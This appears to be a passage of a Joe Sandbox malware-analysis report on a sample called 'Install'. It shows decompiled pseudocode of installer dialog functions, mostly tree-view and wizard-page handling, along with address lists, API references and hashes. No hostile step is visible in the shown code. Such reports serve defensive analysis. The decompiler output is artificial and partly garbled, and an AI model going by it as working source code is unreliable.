                            0x00407854
                            0x0040785d
                            0x00000000
                            0x0040785d
                            0x0040786a
                            0x0040786a
                            0x0040786d
                            0x00407874
                            0x00407877
                            0x00000000
                            0x0040769a
                            0x0040761a
                            0x0040761c
                            0x0040761c
                            0x00407620
                            0x00407623
                            0x00407624
                            0x00407624
                            0x00000000
                            0x0040761c
                            0x00407590
                            0x00407596
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                            0x00404f0d
                            0x00404f26
                            0x00404f2b
                            0x00404f33
                            0x00404f39
                            0x00404f4f
                            0x00404f52
                            0x0040517d
                            0x00405184
                            0x00405198
                            0x00405186
                            0x00405188
                            0x0040518b
                            0x0040518c
                            0x00405193
                            0x00405193
                            0x004051a4
                            0x004051b2
                            0x004051b5
                            0x004051cb
                            0x00405240
                            0x00405243
                            0x00405245
                            0x0040524f
                            0x0040525d
                            0x0040525d
                            0x0040525f
                            0x00405269
                            0x0040526f
                            0x00405272
                            0x00405275
                            0x00405290
                            0x00405277
                            0x00405281
                            0x00405281
                            0x00405275
                            0x00405269
                            0x00000000
                            0x00405243
                            0x004051d0
                            0x004051db
                            0x004051e0
                            0x004051e7
                            0x004051ec
                            0x004051f0
                            0x004051fb
                            0x004051fb
                            0x004051ff
                            0x00405203
                            0x00405207
                            0x0040521a
                            0x00405209
                            0x00405209
                            0x00405210
                            0x00405216
                            0x00405212
                            0x00405212
                            0x00405212
                            0x00405210
                            0x0040521e
                            0x00405220
                            0x00405233
                            0x00405236
                            0x00405239
                            0x00405239
                            0x00405203
                            0x00000000
                            0x004051f0
                            0x004051d2
                            0x004051d9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405293
                            0x00405293
                            0x0040529a
                            0x0040530b
                            0x00405313
                            0x0040531b
                            0x0040531b
                            0x00405324
                            0x00405326
                            0x0040532d
                            0x00405330
                            0x00405330
                            0x00405336
                            0x0040533d
                            0x00405340
                            0x00405340
                            0x00405346
                            0x0040534c
                            0x00405352
                            0x00405352
                            0x0040535f
                            0x004054c0
                            0x004054c7
                            0x004054e4
                            0x004054ea
                            0x004054fc
                            0x004054fc
                            0x00000000
                            0x00405365
                            0x00405367
                            0x0040536c
                            0x00405371
                            0x00405376
                            0x00405378
                            0x00405378
                            0x00405379
                            0x0040537a
                            0x0040537c
                            0x0040537c
                            0x00405384
                            0x004053c5
                            0x004053c7
                            0x004053d7
                            0x004053da
                            0x004053df
                            0x004053e6
                            0x004053e9
                            0x0040548b
                            0x00405494
                            0x0040549c
                            0x0040549c
                            0x004054aa
                            0x004054bb
                            0x004054bb
                            0x00000000
                            0x004054aa
                            0x004053ef
                            0x004053f2
                            0x004053f8
                            0x004053fd
                            0x004053ff
                            0x00405401
                            0x00405407
                            0x0040540e
                            0x00405413
                            0x0040541a
                            0x0040541d
                            0x0040541d
                            0x00405424
                            0x00405430
                            0x00405434
                            0x00405436
                            0x00405436
                            0x00405426
                            0x00405428
                            0x00405428
                            0x00405456
                            0x00405462
                            0x00405471
                            0x00405471
                            0x00405473
                            0x00405476
                            0x0040547f
                            0x00000000
                            0x00405386
                            0x00405391
                            0x00405394
                            0x00405399
                            0x0040539b
                            0x0040539f
                            0x004053af
                            0x004053b9
                            0x004053bb
                            0x004053be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004053a1
                            0x004053a1
                            0x004053a7
                            0x004053a9
                            0x004053a9
                            0x004053aa
                            0x004053ab
                            0x00000000
                            0x004053a1
                            0x00405384
                            0x0040535f
                            0x004052a2
                            0x00000000
                            0x004052b8
                            0x004052c2
                            0x004052c7
                            0x00000000
                            0x00000000
                            0x004052d9
                            0x004052de
                            0x004052ea
                            0x004052ea
                            0x004052ec
                            0x004052fb
                            0x004052fd
                            0x00405301
                            0x00405304
                            0x00000000
                            0x00405304
                            0x004052a2
                            0x00404f58
                            0x00404f5d
                            0x00404f66
                            0x00404f6d
                            0x00404f7f
                            0x00404f8a
                            0x00404f90
                            0x00404f9e
                            0x00404fb2
                            0x00404fb7
                            0x00404fc4
                            0x00404fc9
                            0x00404fdf
                            0x00404ff0
                            0x00404ffd
                            0x00404ffd
                            0x00405000
                            0x00405006
                            0x00405008
                            0x0040500b
                            0x00405010
                            0x00405015
                            0x00405017
                            0x00405017
                            0x00405037
                            0x00405037
                            0x00405039
                            0x0040503a
                            0x0040503f
                            0x00405045
                            0x00405049
                            0x0040504e
                            0x00405056
                            0x0040505a
                            0x0040505f
                            0x00405064
                            0x0040506c
                            0x0040506f
                            0x0040513f
                            0x00405152
                            0x00000000
                            0x00405075
                            0x00405078
                            0x0040507b
                            0x0040507e
                            0x0040507e
                            0x00405084
                            0x0040508d
                            0x00405090
                            0x00405094
                            0x00405097
                            0x0040509a
                            0x004050a3
                            0x004050ac
                            0x004050af
                            0x004050b2
                            0x004050b5
                            0x004050f3
                            0x0040511e
                            0x004050f5
                            0x00405104
                            0x00405104
                            0x004050b7
                            0x004050ba
                            0x004050c8
                            0x004050d2
                            0x004050da
                            0x004050e1
                            0x004050ec
                            0x004050ec
                            0x004050b5
                            0x00405124
                            0x00405125
                            0x00405131
                            0x00405131
                            0x0040513d
                            0x00405158
                            0x0040515b
                            0x00405178
                            0x00000000
                            0x0040515d
                            0x00405162
                            0x0040516b
                            0x004054fe
                            0x00405510
                            0x00405510
                            0x0040515b
                            0x00000000
                            0x0040513d
                            0x0040506f

                            APIs
                            • GetDlgItem.USER32 ref: 00404F1E
                            • GetDlgItem.USER32 ref: 00404F29
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                            • LoadImageW.USER32 ref: 00404F8A
                            • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                            • DeleteObject.GDI32(00000000), ref: 00405000
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                            • ShowWindow.USER32(?,00000005), ref: 00405162
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                            • GlobalFree.KERNEL32 ref: 00405340
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                            • GetDlgItem.USER32 ref: 004054F5
                            • ShowWindow.USER32(00000000), ref: 004054FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                            • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0xffffffff
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0xffffffff
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8);
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8);
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0xffffffff
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                            0x00403fa5
                            0x00403fac
                            0x00404113
                            0x00404117
                            0x0040411b
                            0x0040411d
                            0x00404122
                            0x0040412d
                            0x00404138
                            0x0040413d
                            0x0040413f
                            0x00404141
                            0x00404144
                            0x00404149
                            0x00404157
                            0x00404164
                            0x0040416b
                            0x0040416b
                            0x0040416c
                            0x0040416c
                            0x00404171
                            0x00404177
                            0x0040417e
                            0x00404184
                            0x00404186
                            0x004041c6
                            0x004041cb
                            0x004041d0
                            0x004041d0
                            0x004041d5
                            0x004041de
                            0x004041e0
                            0x004041e5
                            0x004041eb
                            0x004041ef
                            0x004041ef
                            0x004041f4
                            0x004041fa
                            0x00000000
                            0x00000000
                            0x00404205
                            0x0040420b
                            0x00000000
                            0x00000000
                            0x00404214
                            0x0040421c
                            0x00404221
                            0x00404224
                            0x0040422a
                            0x0040422f
                            0x00404232
                            0x00404238
                            0x0040423d
                            0x00404240
                            0x00404246
                            0x0040424e
                            0x00404254
                            0x0040425a
                            0x0040425e
                            0x00404265
                            0x00404265
                            0x00404265
                            0x0040426f
                            0x00404281
                            0x0040428d
                            0x00404292
